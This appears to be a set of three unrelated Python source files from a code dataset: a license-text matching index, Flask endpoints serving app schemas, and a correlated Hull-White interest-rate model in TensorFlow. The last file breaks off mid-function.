rule_token_ids, _use_bigrams=USE_BIGRAM_MULTISETS)
sets_by_rid[rid] = tids_set
msets_by_rid[rid] = mset
####################################################################
####################################################################
# FIXME!!!!!!! we should store them: we need them and we recompute
# them later at match time
tids_set_high = match_set.high_tids_set_subset(
tids_set, len_legalese)
mset_high = match_set.high_multiset_subset(
mset, len_legalese, _use_bigrams=USE_BIGRAM_MULTISETS)
# FIXME!!!!!!!
####################################################################
####################################################################
####################
# update rule thresholds
####################
rule.length_unique = match_set_tids_set_counter(tids_set)
rule.high_length_unique = match_set_tids_set_counter(tids_set_high)
rule.high_length = match_set_multiset_counter(mset_high)
rule.compute_thresholds()
########################################################################
# Finalize index data structures
########################################################################
# Create the tid -> token string lookup structure.
########################################################################
self.tokens_by_tid = tokens_by_tid = [
ts for ts, _tid in sorted(dictionary.items(), key=itemgetter(1))]
self.len_tokens = len_tokens = len(tokens_by_tid)
# some tokens are made entirely of digits and these can create some
# worst case behavior when there are long runs on these
########################################################################
self.digit_only_tids = intbitset([
i for i, s in enumerate(self.tokens_by_tid) if s.isdigit()])
# Finalize automatons
########################################################################
self.negative_automaton.make_automaton()
self.rules_automaton.make_automaton()
if USE_AHO_FRAGMENTS:
self.fragments_automaton.make_automaton()
if USE_RULE_STARTS:
match_aho.finalize_starts(self.starts_automaton)
# OPTIMIZED: sparser dicts for faster lookup
sparsify(self.rid_by_hash)
########################################################################
# Do some sanity checks
########################################################################
msg = 'Inconsistent structure lengths'
assert len_tokens == highest_tid + 1 == len(dictionary), msg
msg = 'Cannot support more than licensedcode.index.MAX_TOKENS: %d' % MAX_TOKENS
assert len_tokens <= MAX_TOKENS, msg
dupe_rules = [rules for rules in dupe_rules_by_hash.values() if len(rules) > 1]
if dupe_rules:
dupe_rule_paths = [
'\n'.join(
sorted([
('file://' + rule.text_file)
if rule.text_file
else ('text: ' + rule.stored_text)
for rule in rules])
)
for rules in dupe_rules
]
msg = ('Duplicate rules: \n' + '\n\n'.join(dupe_rule_paths))
raise AssertionError(msg)
self.optimized = True
def debug_matches(self, matches, message, location=None, query_string=None,
with_text=False, qry=None):
"""
Log debug-level data for a list of `matches`.
"""
logger_debug(message + ':', len(matches))
if qry:
# set line early to ease debugging
match.set_lines(matches, qry.line_by_pos)
if not with_text:
for m in matches:
logger_debug(m)
else:
logger_debug(message + ' MATCHED TEXTS')
from licensedcode.tracing import get_texts
for m in matches:
logger_debug(m)
qt, it = get_texts(m)
print(' MATCHED QUERY TEXT:', qt)
print(' MATCHED RULE TEXT:', it)
print()
def get_spdx_id_matches(self, query, from_spdx_id_lines=True, **kwargs):
"""
Matching strategy for SPDX-Licensed-Identifier style of expressions. If
`from_spdx_id_lines` is True detect only in the SPDX license identifier
lines found in the query. Otherwise use the whole query for detection.
"""
matches = []
if from_spdx_id_lines:
qrs_and_texts = query.spdx_lid_query_runs_and_text()
else:
# If we are not specifically looking at a single SPDX-License-
# identifier line, then use the whole query run with the whole text.
# Note this can only work for small texts or this will likely make
# the expression parser choke if you feed it large texts
query_lines = [ln for _, ln
in tokenize.query_lines(query.location, query.query_string)]
qrs_and_texts = query.whole_query_run(), u'\n'.join(query_lines)
qrs_and_texts = [qrs_and_texts]
for query_run, detectable_text in qrs_and_texts:
if not query_run.matchables:
# this could happen if there was some negative match applied
continue
spdx_match = match_spdx_lid.spdx_id_match(
self, query_run, detectable_text)
query_run.subtract(spdx_match.qspan)
matches.append(spdx_match)
return matches
def get_exact_matches(self, query, deadline=sys.maxsize, **kwargs):
"""
Extract matching strategy using an automaton for multimatching at once.
"""
wqr = query.whole_query_run()
matches = match_aho.exact_match(self, wqr, self.rules_automaton, deadline=deadline)
matches, _discarded = match.refine_matches(matches, self,
query=query, filter_false_positive=False, merge=False)
return matches
def get_fragments_matches(self, query, matched_qspans, deadline=sys.maxsize, **kwargs):
"""
Approximate matching strategy breaking a query in query_runs and using
fragment matching. Return a list of matches.
"""
matches = []
for query_run in query.query_runs:
# we cannot do a sequence match in query run without some high token left
if not query_run.is_matchable(include_low=False, qspans=matched_qspans):
continue
qrun_matches = match_aho.match_fragments(self, query_run)
matches.extend(match.merge_matches(qrun_matches))
# break if deadline has passed
if time() > deadline:
break
return matches
def get_approximate_matches(self, query, matched_qspans, existing_matches,
deadline=sys.maxsize, **kwargs):
"""
Approximate matching strategy breaking a query in query_runs and using
multiple local alignments (aka. diff). Return a list of matches.
"""
matches = []
matchable_rids = self.approx_matchable_rids
already_matched_qspans = matched_qspans[:]
MAX_NEAR_DUPE_CANDIDATES = 10
# first check if the whole file may be close, near-dupe match
whole_query_run = query.whole_query_run()
near_dupe_candidates = match_set.compute_candidates(
query_run=whole_query_run,
idx=self,
matchable_rids=matchable_rids,
top=MAX_NEAR_DUPE_CANDIDATES,
high_resemblance=True,
_use_bigrams=USE_BIGRAM_MULTISETS)
# if near duplicates, we only match the whole file at once against these
# candidates
if near_dupe_candidates:
if TRACE_APPROX_CANDIDATES:
logger_debug('get_query_run_approximate_matches: near dupe candidates:')
for rank, ((sv1, sv2), _rid, can, _inter) in enumerate(near_dupe_candidates, 1):
print(rank, sv1, sv2, can.identifier)
matched = self.get_query_run_approximate_matches(
whole_query_run, near_dupe_candidates, already_matched_qspans, deadline)
matches.extend(matched)
# subtract these
for match in matched:
qspan = match.qspan
query.subtract(qspan)
already_matched_qspans.append(qspan)
# break if deadline has passed
if time() > deadline:
return matches
# otherwise, and in all cases we break things in smaller query runs and
# match each separately
if USE_RULE_STARTS:
query.refine_runs()
if TRACE_APPROX:
logger_debug('get_approximate_matches: len(query.query_runs):', len(query.query_runs))
MAX_CANDIDATES = 70
for query_run in query.query_runs:
# inverted index match and ranking, query run-level
candidates = match_set.compute_candidates(
query_run=query_run,
idx=self,
matchable_rids=matchable_rids,
top=MAX_CANDIDATES,
high_resemblance=False,
_use_bigrams=USE_BIGRAM_MULTISETS)
if TRACE_APPROX_CANDIDATES:
logger_debug('get_query_run_approximate_matches: candidates:')
for rank, ((sv1, sv2), _rid, can, _inter) in enumerate(candidates, 1):
print(rank, sv1, sv2, can.identifier)
matched = self.get_query_run_approximate_matches(
query_run, candidates, matched_qspans, deadline)
matches.extend(matched)
# break if deadline has passed
if time() > deadline:
break
return matches
def get_query_run_approximate_matches(self, query_run, candidates,
matched_qspans, deadline=sys.maxsize, **kwargs):
"""
Return a list of approximate matches for a single query run.
"""
matches = []
# we cannot do a sequence match in query run without some high token left
if not query_run.is_matchable(include_low=False, qspans=matched_qspans):
if TRACE_APPROX:
logger_debug(
'get_query_run_approximate_matches: query_run not matchable:', query_run)
return matches
# Perform multiple sequence matching/alignment for each candidate,
# query run-level for as long as we have more non-overlapping
# matches returned
for _score_vecs, rid, candidate_rule, high_intersection in candidates:
if USE_DMP:
# Myers diff works best when the difference are small, otherwise
# it performs rather poorly as it is not aware of legalese
match_blocks = match_blocks_dmp
high_postings = None
else:
# we prefer to use the high-token-aware sequence matching only
# when the matches are not clear. It works best when things
# are farther apart
match_blocks = match_blocks_seq
high_postings = self.high_postings_by_rid[rid]
high_postings = {
tid: postings for tid, postings in high_postings.items()
if tid in high_intersection}
start_offset = 0
while True:
rule_matches = match_seq.match_sequence(
self, candidate_rule, query_run,
high_postings=high_postings,
start_offset=start_offset,
match_blocks=match_blocks)
if TRACE_APPROX_MATCHES:
self.debug_matches(
matches=rule_matches, message='get_query_run_approximate_matches: rule_matches:',
with_text=True, qry=query_run.query)
if not rule_matches:
break
matches_end = max(m.qend for m in rule_matches)
matches.extend(rule_matches)
if matches_end + 1 < query_run.end:
start_offset = matches_end + 1
continue
else:
break
# break if deadline has passed
if time() > deadline:
break
# break if deadline has passed
if time() > deadline:
break
# FIXME: is this really needed here?
matches = match.merge_matches(matches)
return matches
def match(self, location=None, query_string=None, min_score=0,
as_expression=False, deadline=sys.maxsize, _skip_hash_match=False,
**kwargs):
"""
This is the main entry point to match licenses.
Return a sequence of LicenseMatch by matching the file at `location` or
the `query_string` text against the index. Only include matches with
scores greater or equal to `min_score`.
If `as_expression` is True, treat the whole text as a single SPDX
license expression and use only expression matching.
`deadline` is a time.time() value in seconds by which the processing should stop
and return whatever was matched so far.
`_skip_hash_match` is used only for testing.
"""
assert 0 <= min_score <= 100
if not location and not query_string:
return []
qry = query.build_query(location, query_string, idx=self,
text_line_threshold=15, bin_line_threshold=50)
if not qry:
return []
whole_query_run = qry.whole_query_run()
if not whole_query_run or not whole_query_run.matchables:
return []
if not _skip_hash_match:
matches = match_hash.hash_match(self, whole_query_run)
if matches:
match.set_lines(matches, qry.line_by_pos)
return matches
# TODO: add match to degenerated expressions with custom symbols
if as_expression:
matches = self.get_spdx_id_matches(qry, from_spdx_id_lines=False)
match.set_lines(matches, qry.line_by_pos)
return matches
negative_matches = []
if self.negative_rids:
negative_matches = self.negative_match(whole_query_run)
for neg in negative_matches:
whole_query_run.subtract(neg.qspan)
if TRACE_NEGATIVE:
self.debug_matches(
matches=negative_matches, message='negative_matches',
location=location, query_string=query_string) # , with_text, query)
matches = []
if USE_AHO_FRAGMENTS:
approx = self.get_fragments_matches
else:
approx = self.get_approximate_matches
matchers = [
# matcher, include_low in post-matching remaining matchable check
(self.get_spdx_id_matches, True, 'spdx_lid'),
(self.get_exact_matches, False, 'aho'),
(approx, False, 'seq'),
]
already_matched_qspans = []
for matcher, include_low, matcher_name in matchers:
if TRACE:
logger_debug()
logger_debug('matching with matcher:', matcher_name)
matched = matcher(qry, matched_qspans=already_matched_qspans,
existing_matches=matches, deadline=deadline)
if TRACE:
self.debug_matches(
matches=matched, message='matched with: ' + matcher_name,
location=location, query_string=query_string) # , with_text, query)
matched = match.merge_matches(matched)
matches.extend(matched)
# subtract whole text matched if this is long enough
for m in matched:
if m.rule.is_license_text and m.rule.length > 120 and m.coverage() > 98:
qry.subtract(m.qspan)
# check if we have some matchable left
# do not match further if we do not need to
# collect qspans matched exactly e.g. with coverage 100%
# this coverage check is because we have provision to match fragments (unused for now)
already_matched_qspans.extend(m.qspan for m in matched if m.coverage() == 100)
if not whole_query_run.is_matchable(
include_low=include_low, qspans=already_matched_qspans):
break
# break if deadline has passed
if time() > deadline:
break
if not matches:
return []
if TRACE:
logger_debug()
self.debug_matches(matches=matches, message='matches before final merge',
location=location, query_string=query_string,
with_text=True, qry=qry)
matches, _discarded = match.refine_matches(
matches, idx=self, query=qry, min_score=min_score,
max_dist=MAX_DIST // 2, filter_false_positive=True, merge=True)
matches.sort()
match.set_lines(matches, qry.line_by_pos)
if TRACE:
print()
self.debug_matches(matches=matches, message='final matches',
location=location, query_string=query_string,
with_text=True, qry=qry)
return matches
def negative_match(self, query_run):
"""
Match a query run exactly against negative rules. Return a list
of negative LicenseMatch for a query run, subtract these matches
from the query run.
"""
return match_aho.exact_match(self, query_run, self.negative_automaton)
def _print_index_stats(self):
"""
Print internal Index structures stats. Used for debugging and testing.
"""
try:
from pympler.asizeof import asizeof as size_of
except ImportError:
print('Index statistics will be approximate: `pip install pympler` for correct structure sizes')
from sys import getsizeof as size_of
fields = (
'dictionary',
'tokens_by_tid',
'rid_by_hash',
'rules_by_rid',
'tids_by_rid',
'sets_by_rid',
'msets_by_rid',
'regular_rids',
'negative_rids',
'approx_matchable_rids',
'false_positive_rids',
)
plen = max(map(len, fields)) + 1
internal_structures = [s + (' ' * (plen - len(s))) for s in fields]
print('Index statistics:')
total_size = 0
for struct_name in internal_structures:
struct = getattr(self, struct_name.strip())
try:
print(' ', struct_name, ':', 'length :', len(struct))
except:
print(' ', struct_name, ':', 'repr :', repr(struct))
siz = size_of(struct)
total_size += siz
print(' ', struct_name, ':', 'size in MB:', round(siz / (1024 * 1024), 2))
print(' TOTAL internals in MB:', round(total_size / (1024 * 1024), 2))
print(' TOTAL real size in MB:', round(size_of(self) / (1024 * 1024), 2))
def _tokens2text(self, tokens):
"""
Return a text string from a sequence of token ids.
Used for tracing and debugging.
"""
return u' '.join('None' if t is None else self.tokens_by_tid[t] for t in tokens)
@staticmethod
def loads(saved, fast=True):
"""
Return a LicenseIndex from a pickled string.
"""
pickler = cPickle if fast else pickle
idx = pickler.loads(saved)
# perform some optimizations on the dictionaries
sparsify(idx.dictionary)
return idx
@staticmethod
def load(fn, fast=True):
"""
Return a LicenseIndex loaded from the `fn` file-like object pickled index.
"""
pickler = cPickle if fast else pickle
idx = pickler.load(fn)
# perform some optimizations on the dictionaries
sparsify(idx.dictionary)
return idx
def dumps(self, fast=True):
"""
Return a pickled string of self.
"""
# here cPickle fails when we load it back. Pickle is slower to write but
# works when we read with cPickle :|
pickler = cPickle if fast else pickle
pickled = pickler.dumps(self, protocol=cPickle.HIGHEST_PROTOCOL)
# NB: this is making the usage of cPickle possible... as a weird workaround.
# the gain from dumping using cPickle is not as big with this optimize
# but still much faster than using the plain pickle module
# TODO: revisit me after the Python3 port
import pickletools
pickletools.code2op = sparsify(pickletools.code2op)
pickled = pickletools.optimize(pickled)
return pickled
def dump(self, fn, fast=False):
"""
Dump (write) a pickled self to the `fn` file-like object.
"""
# here cPickle fails when we load it back. Pickle is slower to write but
# works when we read with cPickle :|
pickler = cPickle if fast else pickle
return pickler.dump(self, fn, protocol=cPickle.HIGHEST_PROTOCOL)
def get_weak_rids(len_legalese, tids_by_rid, _idx):
"""
Return a set of "weak" rule ids made entirely of junk tokens: they can only
be matched using an automaton.
"""
weak_rids = set()
weak_rids_add = weak_rids.add
for rid, tids in enumerate(tids_by_rid):
if any(t < len_legalese for t in tids):
continue
weak_rids_add(rid)
if TRACE :
for rid in sorted(weak_rids):
rule = _idx.rules_by_rid[rid]
if not rule.is_negative:
message = (
'WARNING: Weak rule, made only of frequent junk tokens. '
'Can only be matched exactly:',
_idx.rules_by_rid[rid].identifier,
u' '.join(_idx.tokens_by_tid[t] for t in tids))
logger_debug(u' '.join(message))
return weak_rids
def get_matched_rule_ids(matches, query_run):
"""
Yield the subset of matched rule ids from a `matches` LicenseMatch
sequence that are within the `query_run` query run.
"""
qstart = query_run.start
qend = query_run.end
for match in matches:
if qstart <= match.qstart and match.qend <= qend:
yield match.rule.rid
|
the-stack_0_6111 | """
Endpoints to get the schemas
"""
# Import from libraries
from cornflow_client.airflow.api import Airflow
from flask import current_app, request
from flask_apispec import marshal_with, doc
import logging as log
from cornflow_core.authentication import authenticate
# Import from internal modules
from ..models import PermissionsDAG
from ..shared.authentication import Auth
from cornflow_core.exceptions import AirflowError, NoPermission
from ..schemas.schemas import SchemaOneApp, SchemaListApp
from cornflow_core.resources import BaseMetaResource
from ..shared.const import ALL_DEFAULT_ROLES
class SchemaEndpoint(BaseMetaResource):
"""
Endpoint used to obtain names of available apps
"""
ROLES_WITH_ACCESS = ALL_DEFAULT_ROLES
@doc(description="Get list of available apps", tags=["Schemas"])
@authenticate(auth_class=Auth())
@marshal_with(SchemaListApp(many=True))
def get(self):
"""
API method to get a list of dag names
:return: A dictionary with a message and an integer with the HTTP status code
:rtype: Tuple(dict, integer)
"""
user = Auth().get_user_from_header(request.headers)
dags = PermissionsDAG.get_user_dag_permissions(user.id)
available_dags = [{"name": dag.dag_id} for dag in dags]
log.info("User gets list of schema")
return available_dags
class SchemaDetailsEndpoint(BaseMetaResource):
"""
Endpoint used to obtain schemas for one app
"""
ROLES_WITH_ACCESS = ALL_DEFAULT_ROLES
@doc(description="Get instance, solution and config schema", tags=["Schemas"])
@authenticate(auth_class=Auth())
@marshal_with(SchemaOneApp)
def get(self, dag_name):
"""
API method to get the input, output and config schemas for a given dag
:return: A dictionary with a message and a integer with the HTTP status code
:rtype: Tuple(dict, integer)
"""
user = Auth().get_user_from_header(request.headers)
permission = PermissionsDAG.check_if_has_permissions(
user_id=user.id, dag_id=dag_name
)
if permission:
af_client = Airflow.from_config(current_app.config)
if not af_client.is_alive():
log.error(
"Airflow not accessible when getting schema {}".format(dag_name)
)
raise AirflowError(error="Airflow is not accessible")
# try airflow and see if dag_name exists
af_client.get_dag_info(dag_name)
log.info("User gets schema {}".format(dag_name))
# it exists: we try to get its schemas
return af_client.get_schemas_for_dag_name(dag_name)
else:
raise NoPermission(
error="User does not have permission to access this dag",
status_code=403,
)
|
the-stack_0_6113 | # Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Vector of correlated Hull-White models with time-dependent parameters."""
import tensorflow.compat.v2 as tf
from tf_quant_finance.math import gradient
from tf_quant_finance.math import piecewise
from tf_quant_finance.math import random_ops as random
from tf_quant_finance.models import euler_sampling
from tf_quant_finance.models import generic_ito_process
from tf_quant_finance.models import utils
class VectorHullWhiteModel(generic_ito_process.GenericItoProcess):
r"""Ensemble of correlated Hull-White Models.
Represents the Ito process:
```None
dr_i(t) = (theta_i(t) - a_i(t) * r_i(t)) dt + sigma_i(t) * dW_{r_i}(t),
1 <= i <= n,
```
where `W_{r_i}` are 1D Brownian motions with a correlation matrix `Rho(t)`.
For each `i`, `r_i` is the Hull-White process.
`theta_i`, `a_i`, `sigma_i`, `Rho` are positive functions of time.
`a_i` correspond to the mean-reversion rate, `sigma_i` is the volatility of
the process, `theta_i(t)` is the function that determines long run behaviour
of the process `r(t) = (r_1(t), ..., r_n(t))`
and is computed to match the initial (at t=0) discount curve:
```None
\theta_i = df_i(t) / dt + a_i * f_i(t) + 0.5 * sigma_i**2 / a_i
* (1 - exp(-2 * a_i *t)), 1 <= i <= n
```
where `f_i(t)` is the instantaneous forward rate at time `0` for a maturity
`t` and `df_i(t)/dt` is the gradient of `f_i` with respect to the maturity.
See Section 3.3.1 of [1] for details.
The price at time `t` of a zero-coupon bond maturing at `T` is given by
(Ref. [2]):
```None
P(t,T) = P(0,T) / P(0,t) *
exp(-(r(t) - f(0,t)) * G(t,T) - 0.5 * y(t) * G(t,T)^2)
y(t) = int_0^t [exp(-2 int_u^t (a(s) ds)) sigma(u)^2 du]
G(t,T) = int_t^T [exp(-int_t^u a(s) ds) du]
```
If mean-reversion, `a_i`, is constant and the volatility (`sigma_i`), and
correlation (`Rho`) are piecewise constant functions, the process is sampled
exactly. Otherwise, Euler sampling is used.
For `n=1` this class represents Hull-White Model (see
tff.models.hull_white.HullWhiteModel1F).
#### Example. Two correlated Hull-White processes.
```python
import numpy as np
import tensorflow.compat.v2 as tf
import tf_quant_finance as tff
dtype = tf.float64
# Mean-reversion is constant for the two processes. `mean_reversion(t)`
# has shape `[dim] + t.shape`.
mean_reversion = [0.03, 0.02]
# Volatility is a piecewise constant function with jumps at the same locations
# for both Hull-White processes. `volatility(t)` has shape `[dim] + t.shape`.
volatility = tff.math.piecewise.PiecewiseConstantFunc(
jump_locations=[[0.1, 2.], [0.1, 2.]],
values=[[0.01, 0.02, 0.01], [0.01, 0.015, 0.01]],
dtype=dtype)
# Correlation matrix is constant
corr_matrix = [[1., 0.1], [0.1, 1.]]
initial_discount_rate_fn = lambda *args: [0.01, 0.015]
process = tff.models.hull_white.VectorHullWhiteModel(
dim=2, mean_reversion=mean_reversion,
volatility=volatility,
initial_discount_rate_fn=initial_discount_rate_fn,
corr_matrix=corr_matrix,
dtype=dtype)
# Sample 10000 paths using Sobol numbers as a random type.
times = np.linspace(0., 1.0, 10)
num_samples = 10000 # number of trajectories
paths = process.sample_paths(
times,
num_samples=num_samples,
random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,
seed=[4, 2])
# Compute mean for each Hull-White process at the terminal value
tf.math.reduce_mean(paths[:, -1, :], axis=0)
# Expected value: [0.01013373 0.01494516]
```
#### References:
[1]: D. Brigo, F. Mercurio. Interest Rate Models. 2007.
[2]: Leif B. G. Andersen and Vladimir V. Piterbarg. Interest Rate Modeling.
Volume II: Term Structure Models.
"""
def __init__(self,
dim,
mean_reversion,
volatility,
initial_discount_rate_fn,
corr_matrix=None,
dtype=None,
name=None):
"""Initializes the Correlated Hull-White Model.
Args:
dim: A Python scalar which corresponds to the number of correlated
Hull-White Models.
mean_reversion: A real positive `Tensor` of shape `[dim]` or a Python
callable. The callable can be one of the following:
(a) A left-continuous piecewise constant object (e.g.,
`tff.math.piecewise.PiecewiseConstantFunc`) that has a property
`is_piecewise_constant` set to `True`. In this case the object
should have a method `jump_locations(self)` that returns a
`Tensor` of shape `[dim, num_jumps]` or `[num_jumps]`
In the first case, `mean_reversion(t)` should return a `Tensor`
of shape `[dim] + t.shape`, and in the second, `t.shape + [dim]`,
where `t` is a rank 1 `Tensor` of the same `dtype` as the output.
See example in the class docstring.
(b) A callable that accepts scalars (stands for time `t`) and returns a
`Tensor` of shape `[dim]`.
Corresponds to the mean reversion rate.
volatility: A real positive `Tensor` of the same `dtype` as
`mean_reversion` or a callable with the same specs as above.
        Corresponds to the long run price variance.
initial_discount_rate_fn: A Python callable that accepts expiry time as
a real `Tensor` of the same `dtype` as `mean_reversion` and returns a
`Tensor` of shape `input_shape + dim`.
Corresponds to the zero coupon bond yield at the present time for the
input expiry time.
corr_matrix: A `Tensor` of shape `[dim, dim]` and the same `dtype` as
`mean_reversion` or a Python callable. The callable can be one of
the following:
(a) A left-continuous piecewise constant object (e.g.,
`tff.math.piecewise.PiecewiseConstantFunc`) that has a property
`is_piecewise_constant` set to `True`. In this case the object
should have a method `jump_locations(self)` that returns a
`Tensor` of shape `[num_jumps]`. `corr_matrix(t)` should return a
`Tensor` of shape `t.shape + [dim]`, where `t` is a rank 1 `Tensor`
of the same `dtype` as the output.
(b) A callable that accepts scalars (stands for time `t`) and returns a
`Tensor` of shape `[dim, dim]`.
Corresponds to the correlation matrix `Rho`.
dtype: The default dtype to use when converting values to `Tensor`s.
Default value: `None` which means that default dtypes inferred by
TensorFlow are used.
name: Python string. The name to give to the ops created by this class.
Default value: `None` which maps to the default name `hull_white_model`.
Raises:
ValueError:
(a) If either `mean_reversion`, `volatility`, or `corr_matrix` is
a piecewise constant function where `jump_locations` have batch shape
of rank > 1.
      (b) If the batch shape of `jump_locations` is `[n]` with `n` different
        from `dim`.
"""
self._name = name or 'hull_white_model'
with tf.name_scope(self._name):
self._dtype = dtype or None
# If the parameter is callable but not a piecewise constant use
# generic sampling method (e.g., Euler).
self._sample_with_generic = False
def _instant_forward_rate_fn(t):
t = tf.convert_to_tensor(t, dtype=self._dtype)
def _log_zero_coupon_bond(x):
r = tf.convert_to_tensor(
initial_discount_rate_fn(x), dtype=self._dtype)
return -r * x
rate = -gradient.fwd_gradient(
_log_zero_coupon_bond, t, use_gradient_tape=True,
unconnected_gradients=tf.UnconnectedGradients.ZERO)
return rate
def _initial_discount_rate_fn(t):
return tf.convert_to_tensor(
initial_discount_rate_fn(t), dtype=self._dtype)
self._instant_forward_rate_fn = _instant_forward_rate_fn
self._initial_discount_rate_fn = _initial_discount_rate_fn
self._mean_reversion, sample_with_generic = _input_type(
mean_reversion, dim=dim, dtype=dtype, name='mean_reversion')
# Update flag to whether to sample with a generic sampler.
self._sample_with_generic |= sample_with_generic
# Get the volatility type
self._volatility, sample_with_generic = _input_type(
volatility, dim=dim, dtype=dtype, name='volatility')
# Update flag to whether to sample with a generic sampler.
self._sample_with_generic |= sample_with_generic
if corr_matrix is not None:
# Get correlation matrix type
self._corr_matrix, sample_with_generic = _input_type(
corr_matrix, dim=dim, dtype=dtype, name='corr_matrix')
# Update flag to whether to sample with a generic sampler.
self._sample_with_generic |= sample_with_generic
else:
self._corr_matrix = None
if not self._sample_with_generic:
self._exact_discretization_setup(dim)
# Volatility function
def _vol_fn(t, x):
"""Volatility function of correlated Hull-White."""
# Get parameter values at time `t`
volatility = _get_parameters(tf.expand_dims(t, -1), self._volatility)[0]
volatility = tf.transpose(volatility)
if self._corr_matrix is not None:
corr_matrix = _get_parameters(tf.expand_dims(t, -1), self._corr_matrix)
corr_matrix = corr_matrix[0]
corr_matrix = tf.linalg.cholesky(corr_matrix)
else:
corr_matrix = tf.eye(self._dim, dtype=volatility.dtype)
return volatility * corr_matrix + tf.zeros(
x.shape.as_list()[:-1] + [self._dim, self._dim],
dtype=volatility.dtype)
# Drift function
def _drift_fn(t, x):
"""Drift function of correlated Hull-White."""
# Get parameter values at time `t`
mean_reversion, volatility = _get_parameters( # pylint: disable=unbalanced-tuple-unpacking
tf.expand_dims(t, -1), self._mean_reversion, self._volatility)
fwd_rates = self._instant_forward_rate_fn(t)
fwd_rates_grad = gradient.fwd_gradient(
self._instant_forward_rate_fn, t, use_gradient_tape=True,
unconnected_gradients=tf.UnconnectedGradients.ZERO)
drift = fwd_rates_grad + mean_reversion * fwd_rates
drift += (volatility**2 / 2 / mean_reversion
* (1 - tf.math.exp(-2 * mean_reversion * t))
- mean_reversion * x)
return drift
super(VectorHullWhiteModel, self).__init__(dim, _drift_fn, _vol_fn,
dtype, name)
@property
def mean_reversion(self):
return self._mean_reversion
@property
def volatility(self):
return self._volatility
def sample_paths(self,
times,
num_samples=1,
random_type=None,
seed=None,
skip=0,
time_step=None,
name=None):
"""Returns a sample of paths from the correlated Hull-White process.
Uses exact sampling if `self.mean_reversion` is constant and
`self.volatility` and `self.corr_matrix` are all `Tensor`s or piecewise
constant functions, and Euler scheme sampling otherwise.
The exact sampling implements the algorithm and notations in [1], section
10.1.6.1.
Args:
times: Rank 1 `Tensor` of positive real values. The times at which the
path points are to be evaluated.
num_samples: Positive scalar `int32` `Tensor`. The number of paths to
draw.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: `None` which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
        `HALTON_RANDOMIZED` the seed should be a Python integer. For
        `STATELESS` and `STATELESS_ANTITHETIC` it must be supplied as an
        integer `Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
time_step: Scalar real `Tensor`. Maximal distance between time grid points
in Euler scheme. Used only when Euler scheme is applied.
Default value: `None`.
name: Python string. The name to give this op.
Default value: `sample_paths`.
Returns:
A `Tensor` of shape [num_samples, k, dim] where `k` is the size
of the `times` and `dim` is the dimension of the process.
Raises:
ValueError:
(a) If `times` has rank different from `1`.
        (b) If the Euler scheme is used but `time_step` is not supplied.
"""
# Note: all the notations below are the same as in [2].
name = name or self._name + '_sample_path'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, self._dtype)
if len(times.shape) != 1:
raise ValueError('`times` should be a rank 1 Tensor. '
'Rank is {} instead.'.format(len(times.shape)))
if self._sample_with_generic:
if time_step is None:
raise ValueError('`time_step` can not be `None` when at least one of '
'the parameters is a generic callable.')
initial_state = self._instant_forward_rate_fn(0.0)
return euler_sampling.sample(dim=self._dim,
drift_fn=self._drift_fn,
volatility_fn=self._volatility_fn,
times=times,
time_step=time_step,
num_samples=num_samples,
initial_state=initial_state,
random_type=random_type,
seed=seed,
skip=skip,
dtype=self._dtype)
return self._sample_paths(
times, num_samples, random_type, skip, seed)
def sample_discount_curve_paths(self,
times,
curve_times,
num_samples=1,
random_type=None,
seed=None,
skip=0,
name=None):
"""Returns a sample of simulated discount curves for the Hull-white model.
Args:
times: Rank 1 `Tensor` of positive real values. The times at which the
discount curves are to be evaluated.
curve_times: Rank 1 `Tensor` of positive real values. The maturities
at which discount curve is computed at each simulation time.
num_samples: Positive scalar `int`. The number of paths to draw.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: None which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
        `HALTON_RANDOMIZED` the seed should be a Python integer. For
        `STATELESS` and `STATELESS_ANTITHETIC` it must be supplied as an integer
`Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
name: Str. The name to give this op.
Default value: `sample_discount_curve_paths`.
Returns:
A tuple containing two `Tensor`s. The first element is a `Tensor` of
shape [num_samples, m, k, dim] and contains the simulated bond curves
where `m` is the size of `curve_times`, `k` is the size of `times` and
`dim` is the dimension of the process. The second element is a `Tensor`
of shape [num_samples, k, dim] and contains the simulated short rate
paths.
### References:
[1]: Leif B.G. Andersen and Vladimir V. Piterbarg. Interest Rate Modeling,
Volume II: Term Structure Models. 2010.
"""
name = name or self._name + '_sample_discount_curve_paths'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, self._dtype)
curve_times = tf.convert_to_tensor(curve_times, self._dtype)
mean_reversion = self._mean_reversion(times)
volatility = self._volatility(times)
y_t = self._compute_yt(times, mean_reversion, volatility)
rate_paths = self._sample_paths(
times, num_samples, random_type, skip, seed)
short_rate = tf.expand_dims(rate_paths, axis=1)
# Reshape all `Tensor`s so that they have the dimensions same as (or
# broadcastable to) the output shape
      # ([num_samples, num_curve_times, num_sim_times, dim]).
num_curve_nodes = curve_times.shape.as_list()[0] # m
num_sim_steps = times.shape.as_list()[0] # k
times = tf.reshape(
